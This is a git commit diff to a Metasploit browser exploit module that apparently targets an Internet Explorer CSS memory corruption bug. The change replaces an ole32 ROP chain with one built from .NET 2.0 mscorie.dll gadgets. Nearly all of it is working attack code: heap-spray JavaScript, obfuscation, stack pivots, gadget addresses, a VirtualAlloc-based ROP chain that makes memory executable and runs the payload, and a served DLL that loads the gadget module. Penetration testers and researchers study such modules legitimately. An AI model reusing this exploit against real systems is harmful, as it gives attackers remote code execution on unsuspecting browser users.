switch to .NET 2.0 ROP, Merry Xmas!

git-svn-id: file:///home/svn/framework3/trunk@11390 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-12-21 19:24:19 +00:00
parent 3662fb4bc6
commit c4c0cabccb
1 changed files with 79 additions and 86 deletions

View File

@ -133,11 +133,6 @@ class Metasploit3 < Msf::Exploit::Remote
# Full-disclosure post was Dec 8th, original blog Nov 29th
'DisclosureDate' => 'Nov 29 2010',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OldOle32', [ true, 'Whether the target has MS10-083 or not.', false ])
], self.class)
end
@ -145,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
mytarget = nil
agent = request.headers['User-Agent']
print_status("Checking user agent: #{agent}")
#print_status("Checking user agent: #{agent}")
if agent =~ /MSIE 6\.0/
mytarget = targets[3]
elsif agent =~ /MSIE 7\.0/
@ -195,16 +190,12 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending #{self.refname} HTML to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Generate the ROP payload
# We need a different set of RVAs without MS10-083. Can we detect this remotely?
if datastore['OldOle32']
rvas = rvas_pre()
else
rvas = rvas_post()
end
rvas = rvas_mscorie_v2()
rop_stack = generate_rop(buf_addr, rvas)
fix_esp = rva2addr(rvas, 'ret 0x38')
fix_esp = rva2addr(rvas, 'leave / ret')
ret = rva2addr(rvas, 'ret')
pivot = rva2addr(rvas, 'xchg eax, esp / ret')
pivot1 = rva2addr(rvas, 'call [ecx+4] / xor eax, eax / pop ebp / ret 8')
pivot2 = rva2addr(rvas, 'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret')
# Append the payload to the rop_stack
rop_stack << p.encoded
@ -220,24 +211,24 @@ class Metasploit3 < Msf::Exploit::Remote
special_sauce[mytarget['DerefOff'], 4] = [buf_addr].pack('V')
# Low byte must not have bit 1 set
no_bit1 = rand(0xffffffff) & ~2
special_sauce[mytarget['FlagOff'], 4] = [no_bit1].pack('V')
no_bit1 = rand(0xff) & ~2
special_sauce[mytarget['FlagOff'], 1] = [no_bit1].pack('V')
# These are deref'd to figure out what to call
special_sauce[mytarget['CallDeref1'], 4] = [buf_addr].pack('V')
special_sauce[mytarget['CallDeref2'], 4] = [buf_addr].pack('V')
special_sauce[mytarget['CallDeref3'], 4] = [buf_addr + mytarget['Deref4Off']].pack('V')
# Finally, this one becomes eip
special_sauce[mytarget['CallDeref4'] + mytarget['Deref4Off'], 4] = [pivot].pack('V')
special_sauce[mytarget['CallDeref4'] + mytarget['Deref4Off'], 4] = [pivot1].pack('V')
# This byte must be signed (shorter path to flow control)
signed_byte = rand(0xff) | 0x80
special_sauce[mytarget['SignedOff'], 1] = [signed_byte].pack('C')
# These offsets become a fix_esp ret chain ..
special_sauce[0x08, 4] = [fix_esp].pack('V') # our stack pivot ret's to this (fix_esp, from eax)
special_sauce[0x0c, 4] = [fix_esp].pack('V') # part two of fixing esp (two esp+=0x3c)
special_sauce[0x48, 4] = [ret].pack('V') # ropnop, continue as ESP is where we want it now.
special_sauce[0x04, 4] = [pivot2].pack('V') # part two of our stack pivot!
special_sauce[0x0c, 4] = [buf_addr + 0x84 - 4].pack('V') # becomes ebp, for fix esp
special_sauce[0x10, 4] = [fix_esp].pack('V') # our stack pivot ret's to this (fix_esp, from eax)
# Add in the rest of the ROP stack
special_sauce[0x84, rop_stack.length] = rop_stack
@ -245,9 +236,11 @@ class Metasploit3 < Msf::Exploit::Remote
# Format for javascript use
special_sauce = Rex::Text.to_unescape(special_sauce)
js_function = rand_text_alpha(rand(100)+1)
# Construct the javascript
custom_js = <<-EOS
function prepare() {
function #{js_function}() {
heap = new heapLib.ie(0x20000);
var heapspray = unescape("#{special_sauce}");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
@ -255,10 +248,6 @@ var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.alloc(finalspray); }
}
function start() {
prepare();
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
@ -275,6 +264,10 @@ EOS
custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts)
js = heaplib(custom_js)
dll_uri = get_resource()
dll_uri << '/' if dll_uri[-1,1] != '/'
dll_uri << "generic-" + Time.now.to_i.to_s + ".dll"
# Construct the final page
html = <<-EOS
<html>
@ -283,7 +276,8 @@ EOS
#{js}
</script>
</head>
<body onload='start()'>
<body onload='#{js_function}()'>
<object classid="#{dll_uri}#GenericControl">
</body>
</html>
EOS
@ -292,6 +286,21 @@ EOS
send_response(cli, html, { 'Content-Type' => 'text/html' })
elsif request.uri =~ /\.dll$/
print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
# use it's contents ...
ibase = (0x2000 | rand(0x8000)) << 16
dll = Msf::Util::EXE.to_dotnetmem(ibase, rand_text(16))
# Send a .NET v2.0 DLL down
send_response(cli, dll,
{
'Content-Type' => 'application/x-msdownload',
'Connection' => 'close',
'Pragma' => 'no-cache'
})
else
css = <<-EOS
@import url("#{placeholder}");
@ -313,43 +322,27 @@ EOS
end
def rvas_post()
# ole32.dll version 5.1.2600.6010, post MS10-083
def rvas_mscorie_v2()
# mscorie.dll version v2.0.50727.3053
# Just return this hash
{
'xchg eax, esp / ret' => 0x7b60e,
'ret 0x38' => 0x607f1,
'ret' => 0x7b60e+1,
'push eax / ret' => 0x1d1e4,
'pop eax / ret' => 0x58cab,
'pop ebx / ret' => 0x1da39,
'pop ecx / ret' => 0x50479,
'mov eax, [eax] / ret' => 0x22a20,
'call [ecx+4] / xor eax, eax / pop ebp / ret 8' => 0x237e,
'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b,
'leave / ret' => 0x25e5,
'ret' => 0x25e5+1,
'mov eax, [eax] / ret' => 0x22a2,
'mov [ecx], eax / xor eax, eax / pop esi / ret' => 0x360b9,
'xor edi, edi / adc eax, 0x774e13b4 / pop ebp / ret 4' => 0xd87c2,
'add edi, [ebx] / ret' => 0x2cc26,
'rep movsb / pop edi / pop esi / ret' => 0x372c6,
'call [ebx]' => 0x2ad9
}
end
def rvas_pre()
# ole32.dll version 5.1.2600.5512, pre MS10-083
# Just return this hash
{
'xchg eax, esp / ret' => 0x7b5e6,
'ret 0x38' => 0x607c7,
'ret' => 0x7b5e6+1,
'push eax / ret' => 0x1d264,
'pop eax / ret' => 0x1af34,
'pop ebx / ret' => 0x1dae4,
'pop ecx / ret' => 0x4f82a,
'mov eax, [eax] / ret' => 0x22ef3,
'mov [ecx], eax / xor eax, eax / pop esi / ret' => 0x36589,
'xor edi, edi / adc eax, 0x774e13b4 / pop ebp / ret 4' => 0xd858a,
'add edi, [ebx] / ret' => 0x2d0f6,
'rep movsb / pop edi / pop esi / ret' => 0x37796,
'call [ebx]' => 0x2ad9
'call [ecx] / pop ebp / ret 0xc' => 0x1ec4,
'push eax / ret' => 0x1d1e4,
'pop eax / ret' => 0x5ba1,
'pop ebx / ret' => 0x54c0,
'pop ecx / ret' => 0x1e13,
'pop esi / ret' => 0x1d9a,
'pop edi / ret' => 0x2212,
'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6,
'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154,
'call [ecx]' => 0x1ec4
}
end
@ -357,50 +350,46 @@ EOS
# ROP fun! (XP SP3 English, Dec 15 2010)
rvas.merge!({
# Instructions / Name => RVA
'BaseAddress' => 0x774e0000,
'imp_VirtualAlloc' => 0x1448,
'Writable' => 0x12719c
'BaseAddress' => 0x63f00000,
'imp_VirtualAlloc' => 0x10f4
})
rop_stack = [
# Allocate an RWX memory segment
'pop eax / ret',
'pop ecx / ret',
'imp_VirtualAlloc',
'mov eax, [eax] / ret',
'push eax / ret',
'ret',
'call [ecx] / pop ebp / ret 0xc',
0, # lpAddress
0x1000, # dwSize
0x3000, # flAllocationType
0x40, # flProt
:unused,
# Copy the original payload
'pop ecx / ret',
'Writable',
:unused,
:unused,
:unused,
:memcpy_dst,
'mov [ecx], eax / xor eax, eax / pop esi / ret',
'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc',
:unused,
'pop esi / ret',
:unused,
:unused,
:unused,
:memcpy_src,
'xor edi, edi / adc eax, 0x774e13b4 / pop ebp / ret 4',
:unused,
'pop ebx / ret',
:unused,
'Writable',
'add edi, [ebx] / ret',
'pop ecx / ret',
0x200,
'rep movsb / pop edi / pop esi / ret',
:unused,
:unused,
# Execute the payload ;)
'call [ebx]'
'pop edi / ret',
0xdeadf00d # to be filled in above
]
(0x200 / 4).times {
rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret'
}
# Execute the payload ;)
rop_stack << 'call [ecx]'
rop_stack.map! { |e|
if e.kind_of? String
@ -416,6 +405,10 @@ EOS
# Based on stack length..
buf_addr + 0x84 + (rop_stack.length * 4)
elsif e == :memcpy_dst
# Store our new memory ptr into our buffer for later popping :)
buf_addr + 0x84 + (21 * 4)
else
# Literal
e